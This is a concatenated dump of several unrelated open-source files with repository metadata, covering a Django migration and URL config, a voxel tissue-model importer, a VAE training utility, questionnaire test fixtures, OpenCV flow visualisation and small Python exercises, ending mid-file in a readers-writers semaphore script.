('report', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='report', to='reports.report', verbose_name='report')),
],
),
]
| [
"80881547+calderonIrene@users.noreply.github.com"
] | 80881547+calderonIrene@users.noreply.github.com |
b79f13ac51c19583f174cc30d4120446bd7b7960 | 3c1225978cddb35d92969f8b5c2cb12d238d345a | /LayerModel_lib/voxelmodel_importer.py | 9af583845d75bb68bce846dd32f0efac1cfe8587 | [
"MIT"
] | permissive | janbrumm/layermodel_lib | 4f08e0b1e81169ee9cc707b5d7fac9457cc74bc2 | 0d5e0c9ac77d302910823ebc757a4ec99541f3ff | refs/heads/master | 2020-06-03T22:32:14.505315 | 2020-02-18T16:06:46 | 2020-02-18T16:06:46 | 191,758,079 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,722 | py | # This file is part of LayerModel_lib
#
# A tool to compute the transmission behaviour of plane electromagnetic waves
# through human tissue.
#
# Copyright (C) 2018 Jan-Christoph Brumm
#
# Licensed under MIT license.
#
import numpy as np
import logging
from typing import Dict, Tuple
from os import listdir
from os.path import isfile, join
from typing import Optional
from LayerModel_lib.tissue_properties import TissueProperties
from LayerModel_lib.voxelmodel import VoxelModel
from LayerModel_lib.general import ProgressBarConfig as pb
class VoxelModelImporter:
"""
A class to import the AustinMan/AustinWoman models in txt-format or the models provided by the
Helmholtz Zentrum München.
"""
def __init__(self, data_filename: str, tissue_mapping_file: str, file_type: str,
show_progress: Optional[bool]=False):
"""
Create a new importing instance
:param data_filename:
:param tissue_mapping_file: A file which describes the tissue mapping to our tissue IDs
:param file_type:
:param show_progress:
"""
self.data = {}
self.tissue_names = []
self.tissue_mapping = np.zeros(shape=(0,))
# can be activated to show a progress bar in the console
self.show_progress_bar = show_progress
if file_type == 'AVW':
self.read_tissue_mapping(tissue_mapping_file)
self.load_avw_file(data_filename)
elif file_type == 'TXT':
self.read_tissue_mapping(tissue_mapping_file)
self.load_from_txt_files(data_filename)
@staticmethod
def calculate_outer_shape(model: np.ndarray, tissue_mapping: np.ndarray=None) -> Dict:
"""
Calculate the outer_shape of the model, using the optional tissue_mapping to find all skin tissues.
:param model: np.ndarray containing the voxel data
:param tissue_mapping: np.ndarray defining the mapping of tissue IDs in the model
to the tissue IDs in TissueProperties
:return: Dictionary containing the 'front' and 'right' view of the contour of the model.
"""
# get the ids of all the tissues which contain skin in their name
skin_ids_TissueProperties = [i for (i, s) in enumerate(TissueProperties().tissue_names) if 'skin' in s.lower()]
if tissue_mapping is None:
skin_ids = skin_ids_TissueProperties
else:
# if there is a mapping we have to look up the original ids in the mapping table
skin_ids = [i for (i, m) in enumerate(tissue_mapping) if m in skin_ids_TissueProperties]
# set the values of the skin_ids to one
model_binary = np.zeros(model.shape)
for i in skin_ids:
model_binary[np.nonzero(model == i)] = 1
outer_shape = {'front': np.sum(model_binary, axis=0),
'right': np.sum(model_binary, axis=1)}
return outer_shape
@staticmethod
def calculate_trunk_model(voxel_model: VoxelModel, model_type: str, z_start: int, z_end: int)\
-> Tuple[np.ndarray, Dict]:
"""
Calculate the trunk model
the slice z_end will not be included in the final model
:param voxel_model: the voxel model that is converted to a trunk only model
:param model_type: the model_type that is used as basis for the conversion
:param z_start: start slice
:param z_end: end slice (not included)
"""
logging.info("Calculate the trunk model..")
model_trunk = voxel_model.models[model_type][:, :, z_start:z_end]
model_trunk = voxel_model.remove_arms(model_trunk)
mask_trunk = {'x': range(0, model_trunk.shape[0]),
'y': range(0, model_trunk.shape[1]),
'z': range(z_start, z_end)}
return model_trunk, mask_trunk
def read_tissue_mapping(self, tissue_mapping_file: str):
"""
Read in the tissue mapping text file. The file has to be formatted the following way:
ID,Tissue Name, Assigned Tissue Name
0, ExternalAir, ExternalAir
250, Some Fat, Fat
The assigned tissue name has to have the same spelling has the tissue in TissueProperties.
:param tissue_mapping_file: Filename of the tissue mapping text file
:return:
"""
# empty temp list for storing all tissues in the file
# each entry will be a tuple: (ID, Tissue Name, Assigned Tissue Name)
tissues_temp = []
# store the maximum tissue id
max_t_id = 0
with open(tissue_mapping_file) as datafile:
for row in datafile:
try:
(t_id, name, assigned_tissue) = row.split(',')
except ValueError as e:
logging.error("ValueError in row: %s" % row)
if t_id.isdigit():
t_id = int(t_id)
if t_id > max_t_id:
max_t_id = t_id
name = name.strip()
assigned_tissue = assigned_tissue.strip()
tissues_temp.append((t_id, name, assigned_tissue))
# look up the assigned_tissues in the TissueProperties.
tp = TissueProperties()
self.tissue_names = ['' for x in range(max_t_id + 1)]
self.tissue_mapping = np.zeros(max_t_id + 1, dtype=int)
for (t_id, name, assigned_tissue) in tissues_temp:
self.tissue_names[t_id] = name
self.tissue_mapping[t_id] = tp.get_id_for_name(assigned_tissue).astype(int)
def load_avw_file(self, avw_file: str):
"""
Read in the contents of an AnalyzeAVW file, as they are distributed by the Helmholtz Zentrum München.
:param avw_file:
:return:
"""
logging.info("Read the data from an AVW file")
# store the offset of the voxel data from the header
voxel_offset = 0
with open(avw_file, 'r') as f:
if self.show_progress_bar:
pb.progress_bar.max_value = len(f)
for (line_number, line) in enumerate(f):
if self.show_progress_bar:
pb.progress_bar.update(line_number + 1)
# Read the header data until the line 'EndInformation' is reached
if 'EndInformation' in line:
break
# first line has to contain 'AVW_ImageFile'
if line_number == 0:
if 'AVW_ImageFile' not in line:
raise TypeError('%s is not in AVW format' % avw_file)
else:
# read the offset for the beginning of the binary voxel data
voxel_offset = int(line.split()[2])
# All the other lines contain information on the voxel data
if '=' in line: # there is a name=value pair in this line
line_splt = line.split('=')
name = line_splt[0].strip()
value = line_splt[1].strip()
if value.isnumeric():
if value.isdigit():
value = int(value)
else:
value = float(value)
else:
value = value.strip('"')
try:
self.data[name] = value
except KeyError:
logging.error('Failed to set avw_data[%s] to %s' % (name, value))
if self.show_progress_bar:
pb.progress_bar.finish()
if voxel_offset != 0:
# Read in the voxel data starting at voxel_offset
with open(avw_file, 'rb') as f:
f.seek(voxel_offset)
data_size = self.data['Height'] * self.data['Width'] * self.data['Depth']
shape = (self.data['Width'], self.data['Height'], self.data['Depth'])
self.data['image'] = np.reshape(np.fromfile(avw_file, dtype=np.uint8, count=data_size),
newshape=shape,
order='F')
# the voxel data needs to be transposed to fit to our coordinate system
self.data['image'] = np.transpose(self.data['image'], (1, 0, 2))
else:
raise FileNotFoundError('Error reading the AVW file')
def load_from_txt_files(self, txt_files_dir: str):
"""
Read in the data from txt files as provided by the AustinMan/Woman models
:param txt_files_dir:
:return:
"""
logging.info("Read in the data from txt files..")
def is_numeric_file(x: str) -> bool:
# check if x is numeric, excluding the last 4 characters ('.txt')
try:
int(x[0:-4])
return True
except ValueError:
return False
def sorting_key(x: str) -> int:
return int(x[0:-4])
file_list = [f for f in listdir(txt_files_dir) if isfile(join(txt_files_dir, f)) and is_numeric_file(f)]
file_list.sort(key=sorting_key)
# read in the scaling and the extent of the data
with open(join(txt_files_dir, 'input.txt'), 'r') as f:
line = f.readline().split()
x_extent = int(line[0])
self.data['scale'] = {'x': float(line[1])*1e3}
line = f.readline().split()
y_extent = int(line[0])
self.data['scale']['y'] = float(line[1])*1e3
line = f.readline().split()
z_extent = int(line[0])
self.data['scale']['z'] = float(line[1])*1e3
Model_orig = np.zeros([x_extent, y_extent, z_extent], dtype=np.uint8)
if self.show_progress_bar:
pb.progress_bar.max_value = len(file_list)
# read in the data from all the files
for (k, file) in enumerate(file_list):
if self.show_progress_bar:
pb.progress_bar.update(k+1)
with open(join(txt_files_dir, file)) as datafile:
data = datafile.read()
# split the content of each file to single numbers
data = np.array(data.split())
# convert to int
data = data.astype(np.uint8)
# make it a 2D array again
data = data.reshape((y_extent, -1))
Model_orig[:, :, k] = data.transpose()
if self.show_progress_bar:
pb.progress_bar.finish()
self.data['image'] = Model_orig
| [
"jan.brumm@tuhh.de"
] | jan.brumm@tuhh.de |
f47a7b12a982753bb78e4c6384d7afa40c7b1a7c | 59be53d962745ea78a16ab02b5c2c50fba2bdac5 | /ser/migrations/0010_auto_20191223_1645.py | 903022cf696025ce759366d5b7a14e2505a0ae92 | [] | no_license | parth1208/kindcare_django | f8fff73b1b80e246f34337989e3f83629a91995e | f0f919c9db53f1b3d247c1f93f33ef7a4bd9ac20 | refs/heads/master | 2020-09-13T03:15:08.253283 | 2020-04-11T09:27:16 | 2020-04-11T09:27:16 | 222,639,421 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 327 | py | # Generated by Django 2.2.6 on 2019-12-23 11:15
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('ser', '0009_service_list'),
]
operations = [
migrations.RenameModel(
old_name='Service_list',
new_name='servant',
),
]
| [
"parthmangukiya1208@gmail.com"
] | parthmangukiya1208@gmail.com |
3417d38c711c232d09855c1a6c8a217797541729 | 73bb7a5dc600c1b31d70492b5d05865ab27faaef | /python datastructure/linearsearch.py | 4a19627b6c0e7a9ff935a20fda37818b23525f2f | [] | no_license | Karthicksaga/python-Exercise | eb96966e415aea5996ed39bf283cb9d0c49952c9 | 96fd175dd706b7b75cdf49f7ebcaceb8324084ca | refs/heads/master | 2022-12-01T22:46:27.382688 | 2020-08-20T15:40:21 | 2020-08-20T15:40:21 | 289,044,540 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 218 | py | def linearsearch(arr , key):
for i in range (len(arr) ):
if (arr[i] == key):
return i
return -1
a = [134,54,3,233,45,44]
print("Element present at the index " , linearsearch(a , 45))
| [
"noreply@github.com"
] | Karthicksaga.noreply@github.com |
4c4325dee0e093de38777c500d916616aba20fa1 | 0cc4314142cd2f7150ce0fd8500bf09894e2f185 | /python_docker_sample/__init__.py | 7599b14d17b8774f8e71108d635ad2275dc46527 | [] | no_license | xnuinside/python-docker-sample | b99500aa4ce74aec56f89aacf188b2de8a437aa6 | 5c0f10f24485f9451df2939c8c11cbe36e56f081 | refs/heads/main | 2023-03-01T02:47:21.738127 | 2021-02-09T10:03:35 | 2021-02-09T10:03:35 | 337,347,079 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 616 | py | import os
import logging
import urllib.parse
import psycopg2
logger = logging.getLogger(__name__)
def test_db_connection():
db_pass = urllib.parse.quote(os.environ.get("DB_PASS", ""))
conn = psycopg2.connect(
host=os.environ.get("DB_HOST"),
dbname=os.environ.get("DB_NAME"),
user=os.environ.get("DB_USER"),
password=db_pass,
port=os.environ.get("DB_PORT"))
cur = conn.cursor()
cur.execute("CREATE TABLE IF NOT EXISTS test (id serial PRIMARY KEY, num integer, data varchar);")
logger.info('Connected to PostgreSQL database')
test_db_connection()
| [
"iuliia_volkova2@epam.com"
] | iuliia_volkova2@epam.com |
145a7de1d16839c1e3d3043e3317c6296661ca39 | bc12bd18b3bc9abb01e5263be3dbef241b549d31 | /setup.py | 9f77f01d4f1e51c8899ca5d043ebcb0758f86d74 | [
"MIT"
] | permissive | codeforkansascity/clear_my_record_backend | f4f57586de597bc5adfb3014f1348304bf197265 | ecd17c5af304d5b2c7f08482af22e4007c5da137 | refs/heads/master | 2023-01-04T03:41:08.676018 | 2019-04-24T22:19:55 | 2019-04-24T22:19:55 | 172,596,270 | 4 | 2 | MIT | 2022-12-27T15:34:06 | 2019-02-25T22:35:11 | Python | UTF-8 | Python | false | false | 109 | py | from setuptools import setup, find_packages
setup(name="clear_my_record_backend", packages=find_packages())
| [
"noreply@github.com"
] | codeforkansascity.noreply@github.com |
e63d305aeed1b484607f2ee5d3935c2464a2696d | a68e8f2c6092374adf05b88de99092ab99c3fb76 | /firstProject/urls.py | 61da1e514f93e16c29bd2850ada2a422564fdda7 | [] | no_license | inomesh/django | b3a2f5de5f7607c7deb07501a9b454ffa46bf512 | bad4cee930c9ce04f6c3e6267676f59e4f85a3b7 | refs/heads/main | 2022-12-29T16:36:37.660826 | 2020-10-19T12:55:10 | 2020-10-19T12:55:10 | 303,076,626 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,444 | py | """firstProject URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
from accounts.views import (
login_view,
logout_view,
register_view,
)
from products.views import (
home_view,
search_view,
Product_detail_view,
Product_api_detail_view,
Product_list_view,
product_create_view,
)
urlpatterns = [
path('',home_view),
path('login/',login_view),
path('accounts/login/',login_view),
path('logout/',logout_view),
path('register/',register_view),
path('search/',search_view),
path('products/',Product_list_view),
path('products/<int:pk>/',Product_detail_view),
# path('products/1/',Product_detail_view),
path('forms/',product_create_view),
path('api/products/<int:pk>/',Product_api_detail_view),
path('admin/', admin.site.urls)
]
| [
"nomesh.sehgal@gmail.com"
] | nomesh.sehgal@gmail.com |
6eab6235773fadc371788dc6921ac27ab34d157e | 6f866eb49d0b67f0bbbf35c34cebe2babe2f8719 | /tests/app/views/handlers/conftest.py | 8ac724a725dc9f88afecffd8b9b45dc2787c076c | [
"MIT",
"LicenseRef-scancode-proprietary-license"
] | permissive | ONSdigital/eq-questionnaire-runner | 681b0d081f9cff0ee4ae3017ecc61f7390d553bf | 87e7364c4d54fee99e6a5e96649123f11c4b53f1 | refs/heads/main | 2023-09-01T21:59:56.733363 | 2023-08-31T15:07:55 | 2023-08-31T15:07:55 | 219,752,509 | 12 | 18 | MIT | 2023-09-14T11:37:31 | 2019-11-05T13:32:18 | Python | UTF-8 | Python | false | false | 7,411 | py | import uuid
from datetime import datetime, timedelta, timezone
import pytest
from freezegun import freeze_time
from mock import Mock
from app.authentication.auth_payload_versions import AuthPayloadVersion
from app.data_models import QuestionnaireStore
from app.data_models.metadata_proxy import MetadataProxy
from app.data_models.session_data import SessionData
from app.data_models.session_store import SessionStore
from app.questionnaire import QuestionnaireSchema
from tests.app.parser.conftest import get_response_expires_at
time_to_freeze = datetime.now(timezone.utc).replace(second=0, microsecond=0)
tx_id = str(uuid.uuid4())
response_id = "1234567890123456"
period_str = "2016-01-01"
period_id = "2016-02-01"
ref_p_start_date = "2016-02-02"
ref_p_end_date = "2016-03-03"
ru_ref = "432423423423"
ru_name = "ru_name"
user_id = "789473423"
schema_name = "1_0000"
feedback_count = 1
display_address = "68 Abingdon Road, Goathill"
form_type = "I"
collection_exercise_sid = "ce_sid"
case_id = "case_id"
survey_id = "021"
data_version = "0.0.1"
feedback_type = "Feedback type"
feedback_text = "Feedback text"
feedback_type_question_category = "Feedback type question category"
started_at = str(datetime.now(tz=timezone.utc).isoformat())
language_code = "cy"
case_type = "I"
channel = "H"
case_ref = "1000000000000001"
region_code = "GB_WLS"
response_expires_at = get_response_expires_at()
@pytest.fixture
@freeze_time(time_to_freeze)
def session_data():
return SessionData(
language_code="cy",
)
@pytest.fixture
def confirmation_email_fulfilment_schema():
return QuestionnaireSchema(
{
"form_type": "H",
"region_code": "GB-WLS",
"submission": {"confirmation_email": True},
}
)
@pytest.fixture
def language():
return "en"
@pytest.fixture
def schema():
return QuestionnaireSchema(
{
"post_submission": {"view_response": True},
"title": "Test schema - View Submitted Response",
}
)
@pytest.fixture
def storage():
return Mock()
def set_storage_data(
storage_,
raw_data="{}",
version=1,
submitted_at=None,
):
storage_.get_user_data = Mock(
return_value=(raw_data, version, collection_exercise_sid, submitted_at)
)
@pytest.fixture
def session_data_feedback():
return SessionData(
language_code=language_code,
feedback_count=feedback_count,
)
@pytest.fixture
def schema_feedback():
return QuestionnaireSchema({"survey_id": survey_id, "data_version": data_version})
@pytest.fixture
def metadata():
return MetadataProxy.from_dict(
{
"tx_id": tx_id,
"user_id": user_id,
"schema_name": schema_name,
"collection_exercise_sid": collection_exercise_sid,
"period_id": period_id,
"period_str": period_str,
"ref_p_start_date": ref_p_start_date,
"ref_p_end_date": ref_p_end_date,
"ru_ref": ru_ref,
"response_id": response_id,
"form_type": form_type,
"display_address": display_address,
"case_type": case_type,
"channel": channel,
"case_ref": case_ref,
"region_code": region_code,
"case_id": case_id,
"language_code": language_code,
"response_expires_at": response_expires_at,
}
)
@pytest.fixture
def metadata_v2():
return MetadataProxy.from_dict(
{
"version": AuthPayloadVersion.V2,
"tx_id": tx_id,
"case_id": case_id,
"schema_name": schema_name,
"collection_exercise_sid": collection_exercise_sid,
"response_id": response_id,
"channel": channel,
"region_code": region_code,
"account_service_url": "account_service_url",
"response_expires_at": get_response_expires_at(),
"survey_metadata": {
"data": {
"period_id": period_id,
"period_str": period_str,
"ref_p_start_date": ref_p_start_date,
"ref_p_end_date": ref_p_end_date,
"ru_ref": ru_ref,
"ru_name": ru_name,
"case_type": case_type,
"form_type": form_type,
"case_ref": case_ref,
"display_address": display_address,
"user_id": user_id,
}
},
}
)
@pytest.fixture
def response_metadata():
return {
"started_at": started_at,
}
@pytest.fixture
def submission_payload_expires_at():
return datetime.now(timezone.utc) + timedelta(seconds=5)
@pytest.fixture
def submission_payload_session_data():
return SessionData(
language_code="cy",
)
@pytest.fixture
def submission_payload_session_store(
submission_payload_session_data,
submission_payload_expires_at,
): # pylint: disable=redefined-outer-name
return SessionStore("user_ik", "pepper", "eq_session_id").create(
"eq_session_id",
"user_id",
submission_payload_session_data,
submission_payload_expires_at,
)
@pytest.fixture
def mock_questionnaire_store(mocker):
storage_ = mocker.Mock()
storage_.get_user_data = mocker.Mock(return_value=("{}", "ce_id", 1, None))
questionnaire_store = QuestionnaireStore(storage_)
questionnaire_store.metadata = MetadataProxy.from_dict(
{
"tx_id": "tx_id",
"case_id": "case_id",
"ru_ref": ru_ref,
"user_id": user_id,
"collection_exercise_sid": collection_exercise_sid,
"period_id": period_id,
"schema_name": schema_name,
"account_service_url": "account_service_url",
"response_id": "response_id",
"response_expires_at": get_response_expires_at(),
}
)
return questionnaire_store
@pytest.fixture
def mock_questionnaire_store_v2(mocker):
storage_ = mocker.Mock()
storage_.get_user_data = mocker.Mock(return_value=("{}", "ce_id", 1, None))
questionnaire_store = QuestionnaireStore(storage_)
questionnaire_store.metadata = MetadataProxy.from_dict(
{
"version": AuthPayloadVersion.V2,
"tx_id": "tx_id",
"case_id": case_id,
"schema_name": schema_name,
"collection_exercise_sid": collection_exercise_sid,
"response_id": response_id,
"channel": channel,
"region_code": region_code,
"account_service_url": "account_service_url",
"response_expires_at": get_response_expires_at(),
"survey_metadata": {
"data": {
"period_id": period_id,
"period_str": period_str,
"ref_p_start_date": ref_p_start_date,
"ref_p_end_date": ref_p_end_date,
"ru_ref": ru_ref,
"ru_name": ru_name,
"case_type": case_type,
"form_type": form_type,
"case_ref": case_ref,
"display_address": display_address,
"user_id": user_id,
}
},
}
)
return questionnaire_store
| [
"noreply@github.com"
] | ONSdigital.noreply@github.com |
d4fe8e6fe210d8669eb229701c04aea112388cb0 | bc3371741f17db72556849a0ca7003774a5d4c79 | /utils/show_with_pattern.py | 9f4b6a2d9329447a37bb2421015ee08086d07a34 | [] | no_license | laura-wang/video_repres_sts | 659067699c4b714933b6d493cb0fc2df65760d06 | e79986b4af749e467476abff7c9ce99c1f8a6a8b | refs/heads/master | 2023-03-02T14:00:00.678042 | 2021-02-09T03:01:48 | 2021-02-09T03:01:48 | 262,689,178 | 48 | 9 | null | 2021-02-09T03:01:50 | 2020-05-10T01:17:57 | Python | UTF-8 | Python | false | false | 3,229 | py | import cv2
from utils.show_flow import computeImg
import numpy as np
def show_pattern_1(img):
cv2.line(img, (0, 28), (112, 28), color=(0, 255, 0))
cv2.line(img, (0, 56), (112, 56), color=(0, 255, 0))
cv2.line(img, (0, 84), (112, 84), color=(0, 255, 0))
cv2.line(img, (28, 0), (28, 112), color=(0, 255, 0))
cv2.line(img, (56, 0), (56, 112), color=(0, 255, 0))
cv2.line(img, (84, 0), (84, 112), color=(0, 255, 0))
cv2.imshow('pattern 1', img)
cv2.waitKey()
def show_pattern_2(img):
cv2.rectangle(img, (14, 14), (98, 98), (0, 255, 0))
cv2.rectangle(img, (28, 28), (84, 84), (0, 255, 0))
cv2.rectangle(img, (42, 42), (70, 70), (0, 255, 0))
cv2.imshow('pattern 2', img)
cv2.waitKey()
def show_pattern_3(img):
cv2.line(img, (0, 0), (112, 112), color=(0, 255, 0))
cv2.line(img, (112, 0), (0, 112), color=(0, 255, 0))
cv2.line(img, (56, 0), (56, 112), color=(0, 255, 0))
cv2.line(img, (0, 56), (112, 56), color=(0, 255, 0))
# cv2.line(img, (0, 56), (112, 56), color=(0, 255, 0))
# cv2.line(img, (0, 84), (112, 84), color=(0, 255, 0))
#
# cv2.line(img, (28, 0), (28, 112), color=(0, 255, 0))
# cv2.line(img, (56, 0), (56, 112), color=(0, 255, 0))
# cv2.line(img, (84, 0), (84, 112), color=(0, 255, 0))
cv2.imshow('pattern 3', img)
cv2.waitKey()
def show(sample_batched):
# video clip: 3 x 16 x 112 x 112
# flow: 15 x 112 x 112
video_clip, u_flow_15, v_flow_15, motion_labels, du, dv= sample_batched['clip'][0], sample_batched['u_flow'][0], sample_batched['v_flow'][0], \
sample_batched['motion_label'][0] , sample_batched['du'], sample_batched['dv']
video_clip = np.transpose(video_clip, (1, 2, 3, 0))
## dv
du_x_sum = du['du_x_sum'][0].numpy()
du_y_sum = du['du_y_sum'][0].numpy()
motion_labels = motion_labels.numpy()
mb_u_sum = computeImg(du_x_sum, du_y_sum)
print("u pattern 1:", motion_labels[0])
show_pattern_1(mb_u_sum.copy())
print("u pattern 2:", motion_labels[4])
show_pattern_2(mb_u_sum.copy())
print("u pattern 3:", motion_labels[8])
show_pattern_3(mb_u_sum.copy())
## dv
dv_x_sum = dv['dv_x_sum'][0].numpy()
dv_y_sum = dv['dv_y_sum'][0].numpy()
mb_v_sum = computeImg(dv_x_sum, dv_y_sum)
print("v pattern 1:", motion_labels[2])
show_pattern_1(mb_v_sum.copy())
print("v pattern 2:", motion_labels[6])
show_pattern_2(mb_v_sum.copy())
print("v pattern 3:", motion_labels[10])
show_pattern_3(mb_v_sum.copy())
## global
print("global u:", motion_labels[-2])
print("global v:", motion_labels[-1])
print("motion label:", motion_labels[:])
for i in range(15):
cur_video_clip = video_clip[i].numpy()
cv2.imshow("flip img", cur_video_clip)
cur_u_flow = u_flow_15[i].numpy()
cur_v_flow = v_flow_15[i].numpy()
cur_flow = computeImg(cur_u_flow, cur_v_flow)
cv2.imshow('flow', cur_flow)
cv2.waitKey()
| [
"noreply@github.com"
] | laura-wang.noreply@github.com |
3dc4c09fb5506a33933c0f69ed47ea51604b13d2 | 5102f7b8a300186496ce7691c6135efeeaeedd6c | /jobplus/app.py | 8fefd43ae3d75fa52ccf45f67da58614eba6ec85 | [] | no_license | ISONEK/jobplus10-3 | c0bc4ddfca67e54b5015cd9b1bfbfb2499338209 | b595e3c53ced93efa7883c67a4633132b5f52c15 | refs/heads/master | 2022-10-20T20:53:15.506235 | 2019-02-25T14:05:14 | 2019-02-25T14:05:14 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 336 | py | from flask import Flask
from flask_migrate import Migrate
from .config import configs
from .handlers import front
from jobplus.models import db
def create_app(config):
app = Flask(__name__)
app.config.from_object(configs.get(config))
db.init_app(app)
Migrate(app,db)
app.register_blueprint(front)
return app
| [
"1195581533@qq.com"
] | 1195581533@qq.com |
ef21f8305b1e4ef83d17f3b644b05e38dec6dd3a | 6cf74f8f1b203441e2964e5088e774c4ab973166 | /reviousNum.py | 796e09daef4907225c8c8d4c0cb4a32d9680751d | [] | no_license | KaiTang26/algo_lab | 50f6467610f5ce86080565dcf2b41f3cfbd8fe41 | aedd4d17b5b89b020a94268d2be963abc7743260 | refs/heads/master | 2023-01-09T08:17:18.965158 | 2020-01-31T15:52:52 | 2020-01-31T15:52:52 | 234,395,429 | 0 | 0 | null | 2023-01-05T06:11:06 | 2020-01-16T19:28:45 | JavaScript | UTF-8 | Python | false | false | 330 | py | def reverseNum(num):
digit_1 = num%10
digit_3 = num // 100
digit_2 = (num%100) //10
result = digit_1*100 + digit_2 *10 +digit_3
print(result)
def isLeapYear(yr):
print(yr % 100)
if((not(yr % 100 ==0) and (yr%400==0)) or (yr % 4 == 0 ) ):
return True
return False
print(list(range(10,0,-2)))
| [
"16kt16@queensu.ca"
] | 16kt16@queensu.ca |
7b71b890968014896983304e32911154a7972598 | dd91782c3983c25aa3b854d7e75f01053640fa73 | /scripts/test_clac.py | ff42242d3d0e273b90f6f48184d9ad41f1720527 | [] | no_license | wp520133/sum | 652bcfcc185a3e3aa235ea1301e55413034ab45f | e3831910495fb074eb7e97fb51e52baf653f6301 | refs/heads/master | 2022-10-07T01:30:05.490675 | 2020-06-11T14:48:58 | 2020-06-11T14:48:58 | 271,539,147 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 671 | py | import unittest
from page.page_clac import PageClac
from parameterized import parameterized
from tools.read_txt import read_txt
from base.get_driver import GetDriver
import pytest
import allure
class TestClac(unittest.TestCase):
driver = None
@classmethod
def setUpClass(cls) -> None:
cls.driver = GetDriver().get_driver()
cls.clac = PageClac(cls.driver)
@classmethod
def tearDownClass(cls) -> None:
GetDriver().quit_driver()
# @parameterized.expand(read_txt("data.txt"))
@allure.step(title="计算")
def test_add_clac(self):
self.clac.page_add_clac(1, 2)
if __name__ == '__main__':
pytest.main()
| [
"17327767735@163.com"
] | 17327767735@163.com |
34c235b15d381ca4e50eb70514ac45360134f6d5 | b2da7cdef0e2214f35554a2624b2c48379f9ea0e | /src/utils.py | cb04da45a3eb24ce72dbe8c88cbae36d02529162 | [
"MIT"
] | permissive | FaisalAhmed0/variational-autoencoder | 9aa2afa7e40fc1aad32dc2f5abb763e2fd0c9014 | a6c1c96da8063d822aef2e2bdd69d7cb1b35c2cd | refs/heads/main | 2023-08-14T18:34:38.605110 | 2021-10-03T00:40:34 | 2021-10-03T00:40:34 | 397,566,185 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,588 | py | import torch
import torch.nn.functional as F
from torchvision.utils import make_grid
import matplotlib.pyplot as plt
def vae_loss(logvar_z, mean_z, output, target, batch_size, mse=True):
# KL Divergence between the prior and the posterior
kl_divergence = - 0.5 * (torch.sum(1 + logvar_z - mean_z.pow(2) - logvar_z.exp(), dim=1)).sum()
# reconstruction loss
if mse:
reconstruction_loss = F.mse_loss(output, target, reduction="sum")
else:
reconstruction_loss = F.binary_cross_entropy(output, target, reduction="sum")
loss = (1/batch_size) * (kl_divergence + reconstruction_loss)
return loss
# simple function to implemenet the reparametrization trick
def reparametrization(mean, logv, device):
eps = torch.randn_like(mean, device=device)
z = mean + eps * logv.exp().pow(0.5)
return z
def train(encoder, decoder, loss, optimizer, dataloader, epochs, testloader, channels=1, height=28, width=28, plot=False, mse=False, activation=True, data="mnist", plot_freq=10, device='cpu'):
losses = []
test_losses = []
# Main training loop
for epoch in range(epochs):
for img, _ in dataloader:
if data == "freyface":
img_flattend = img.reshape(-1, (torch.tensor(img.shape[1:])).prod()).to(torch.float32)
else:
img_flattend = img.reshape(-1, (torch.tensor(img.shape[1:])).prod())
mu, logv = encoder(img_flattend.to(device))
z = reparametrization(mu, logv, device)
if activation:
output = decoder(z.to(device), torch.sigmoid)
else:
output = decoder(z.to(device))
loss = vae_loss(logv.to(device), mu.to(device), output.to(device), img_flattend.to(device), len(img), mse=mse)
optimizer.zero_grad()
loss.backward()
optimizer.step()
losses.append(-loss)
# plot some results every 10 epochs
if (epoch+1) % plot_freq == 0 :
targets = img[:10]
output_reshaped = output.reshape(-1, channels, height, width)[:10]
target_grid = make_grid(targets.cpu().detach(), nrow=10)
if mse:
output_grid = make_grid(output_reshaped.cpu().detach().to(torch.int32), nrow=10)
else:
output_grid = make_grid(output_reshaped.cpu().detach(), nrow=10)
if plot:
plt.figure(figsize=(15, 10))
plt.imshow(target_grid.permute(1, 2, 0))
plt.figure(figsize=(15, 10))
plt.imshow(output_grid.permute(1, 2, 0))
plt.show()
# evaluate on the test set
with torch.no_grad():
for img, _ in testloader:
if data == "freyface":
img_flattend = img.reshape(-1, (torch.tensor(img.shape[1:])).prod()).to(torch.float32)
else:
img_flattend = img.reshape(-1, (torch.tensor(img.shape[1:])).prod())
mu, logv = encoder(img_flattend.to(device))
z = reparametrization(mu, logv, device)
if activation:
output = decoder(z.to(device), torch.sigmoid)
else:
output = decoder(z.to(device))
test_loss = vae_loss(logv.to(device), mu.to(device), output.to(device), img_flattend.to(device), len(img), mse=mse)
# test_loss = vae_loss(logv.to(device), mu.to(device), output.to(device), img_flattend.to(device), 60000, len(img), mse=False)
test_losses.append(- test_loss)
print(f"Epoch: {epoch+1}, train loss: {loss}, test loss: {test_loss}")
return losses, test_losses, target_grid, output_grid
# plot a batch of images as a grid.
def plot_grid(dataloader):
images, _ = next(iter(dataloader))
grid = make_grid(images, )
plt.figure(figsize=(10, 10))
plt.imshow(grid.permute(1, 2, 0))
| [
"noreply@github.com"
] | FaisalAhmed0.noreply@github.com |
8ccba5973dc92209878232bd5232bebd2f5d5879 | fd38e7f2a3c4113170f149bd8a5a2f481e799442 | /Cvicenie 03/readers_writers_starvation_prevention.py | 6b2b86487ae451422520c8f7ed2ee985d4717d97 | [] | no_license | Meidie/fei-ppds | 1424efcf8357de8267c2e23589c9c92bbd8543de | 4cf37fde561ed78513b0812d2174a76e22132d9c | refs/heads/main | 2023-05-06T09:14:10.688689 | 2021-05-03T21:08:27 | 2021-05-03T21:08:27 | 339,423,215 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,860 | py | from fei.ppds import Thread, Semaphore, print, randint
from light_switch import LightSwitch
from time import sleep
NUMBER_OF_READERS = 5
